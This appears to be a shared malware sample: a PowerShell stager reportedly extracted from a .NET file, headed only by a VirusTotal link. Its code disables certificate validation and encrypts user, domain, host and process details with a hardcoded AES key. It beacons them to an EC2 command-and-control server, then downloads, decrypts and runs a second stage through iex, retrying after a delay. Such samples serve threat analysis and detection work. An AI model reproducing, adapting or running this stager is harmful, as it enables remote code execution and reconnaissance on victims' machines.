Malicious Powershell Embedded in MSIL file

1. # malicious powershell embedded in https://www.virustotal.com/#/file/c559fb75ccbe922c2b3f28c40f6525d575406d64febd87b68d0c4c0141d4aaa6/detection
2.  
3. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
4. $sc="https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com:443"
5. $s="https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com:443/images/static/content/"
6. function CAM ($key,$IV){
7. $a = New-Object -TypeName "System.Security.Cryptography.RijndaelManaged"
8. $a.Mode = [System.Security.Cryptography.CipherMode]::CBC
9. $a.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
10. $a.BlockSize = 128
11. $a.KeySize = 256
12. if ($IV)
13. {
14. if ($IV.getType().Name -eq "String")
15. {$a.IV = [System.Convert]::FromBase64String($IV)}
16. else
17. {$a.IV = $IV}
18. }
19. if ($key)
20. {
21. if ($key.getType().Name -eq "String")
22. {$a.Key = [System.Convert]::FromBase64String($key)}
23. else
24. {$a.Key = $key}
25. }
26. $a}
27. function ENC ($key,$un){
28. $b = [System.Text.Encoding]::UTF8.GetBytes($un)
29. $a = CAM $key
30. $e = $a.CreateEncryptor()
31. $f = $e.TransformFinalBlock($b, 0, $b.Length)
32. [byte[]] $p = $a.IV + $f
33. [System.Convert]::ToBase64String($p)
34. }
35. function DEC ($key,$enc){
36. $b = [System.Convert]::FromBase64String($enc)
37. $IV = $b[0..15]
38. $a = CAM $key $IV
39. $d = $a.CreateDecryptor()
40. $u = $d.TransformFinalBlock($b, 16, $b.Length - 16)
41. [System.Text.Encoding]::UTF8.GetString($u)}
42. function Get-Webclient ($Cookie) {
43. $d = (Get-Date -Format "dd/MM/yyyy");
44. $d = [datetime]::ParseExact($d,"dd/MM/yyyy",$null);
45. $k = [datetime]::ParseExact("09/08/2018","dd/MM/yyyy",$null);
46. if ($k -lt $d) {exit}
47. $username = ""
48. $password = ""
49. $proxyurl = ""
50. $wc = New-Object System.Net.WebClient;
51.  
52. $h=""
53. if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add("Host",$h)}
54. elseif($h){$script:s="https://$($h)images/static/content/";$script:sc="https://$($h)"}
55. $wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko")
56. $wc.Headers.Add("Referer","")
57. if ($proxyurl) {
58. $wp = New-Object System.Net.WebProxy($proxyurl,$true);
59. if ($username -and $password) {
60. $PSS = ConvertTo-SecureString $password -AsPlainText -Force;
61. $getcreds = new-object system.management.automation.PSCredential $username,$PSS;
62. $wp.Credentials = $getcreds;
63. } else { $wc.UseDefaultCredentials = $true; }
64. $wc.Proxy = $wp; } else {
65. $wc.UseDefaultCredentials = $true;
66. $wc.Proxy.Credentials = $wc.Credentials;
67. } if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") }
68. $wc }
69. function primer {
70. if ($env:username -eq "$($env:computername)$"){$u="NT AUTHORITY\SYSTEM"}else{$u=$env:username}
71. $o="$env:userdomain\$u;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com"
72. $pp=enc -key 0Kdjin+hG/Ym53Fa2i4C8y8PSh8ckR1zIl5CkHrPV00= -un $o
73. $primer = (Get-Webclient -Cookie $pp).downloadstring($s)
74. dec -key 0Kdjin+hG/Ym53Fa2i4C8y8PSh8ckR1zIl5CkHrPV00= -enc $primer}
75. $primer = primer
76. if ($primer) {$primer| iex} else {
77. start-sleep 1800
78. primer | iex }